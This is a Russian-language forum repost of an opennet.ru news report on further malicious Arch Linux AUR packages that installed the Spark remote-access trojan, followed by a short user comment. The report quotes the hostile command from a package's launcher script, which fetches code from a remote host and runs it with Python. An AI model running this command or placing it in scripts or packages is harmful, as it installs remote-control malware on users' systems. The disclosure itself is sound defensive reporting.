В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе.
В файле PKGBUILD проблемного пакета была определена установка скрипта для запуска браузера google-chrome-stable.sh, в котором среди прочего присутствовала команда 'python -c "$(curl https://segs.lol/9wUb1Z)"', загружавшая вредоносное ПО, распознанное сервисом VirusTotal как троян Spark, позволяющий удалённо управлять системой, запускать процессы, передавать файлы, инспектировать трафик и отправлять скриншоты.
Вредоносный пакет google-chrome-stable был загружен позавчера и был удалён администраторами AUR через несколько часов после появления. Почти сразу после удаления google-chrome-stable в AUR были загружены два вредоносных пакета - "chrome" и "chrome-bin", содержащие аналогичный сценарий установки вредоносного ПО на систему пользователя.
Следом было выявлено ещё три пакета с вредоносным кодом:
ttf-mac-fonts-all, ttf-ms-fonts-all и gromit.
Источник: https://www.opennet.ru/opennews/art.shtml?num=63662
(opennet.ru, основная лента)
[ON] В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
Модератор: Модераторы разделов
-
- Бот
- Сообщения: 6001
- ОС: gnu/linux
[ON] В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
Последний раз редактировалось rssbot 01.08.2025 23:06, всего редактировалось 1 раз.
Причина: Updated upstream
Причина: Updated upstream
-
- Сообщения: 2819
- ОС: gentoo fluxbox
Re: [ON] В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных пакетов
Хорошо работают админы! А у нас?